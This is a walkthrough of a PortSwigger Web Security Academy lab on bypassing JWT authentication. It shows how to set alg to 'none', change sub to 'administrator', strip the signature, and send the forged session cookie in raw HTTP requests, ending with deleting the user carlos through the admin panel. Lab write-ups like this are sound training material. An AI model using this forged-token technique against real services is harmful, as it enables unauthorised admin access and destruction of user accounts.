JWT authentication bypass via flawed signature verification

https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification

Description

This lab uses a JWT-based mechanism for handling sessions. The server is insecurely configured to accept unsigned JWTs.

To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

Solution

Go to login page and access as wiener user.

JWT extension reveal that there's a JWT token, obviously related to wiener user account

{"iss":"portswigger","exp":1742670990,"sub":"wiener"}

Send it to repeater and select JSON web Token tab to deep dive to it

Using JSON Web Token tab, modify the sub field inserting: "administrator" and add as alg: "none",

after that, go again into Pretty tab and change the id value to 'administrator': GET /my-account?id=administrator HTTP/2 and delete the signature of the cookie session (the last part):

GET /my-account?id=administrator HTTP/2
Host: 0a1f00cf0301c91183362366006a000a.web-security-academy.net
Cookie: session=eyJraWQiOiJlMmNlOWNjNC0yNWNiLTRmNjAtYjcyMS05M2FlYjYyMWI2NTMiLCJhbGciOiJub25lIn0.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc0MjY3Mzg5OCwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.

click first on the Send button and then on Following redirection button

Now, we're authenticated as administrator!

Checking the response the admin panel's path is: /admin

so we can move there via a GET request: GET /admin HTTP/2

analyzing the response, we see that the request to delete the user Carlos is the following: GET /admin/delete?username=carlos HTTP/2

So, Send and click to Following redirection to delete it and complete the lab.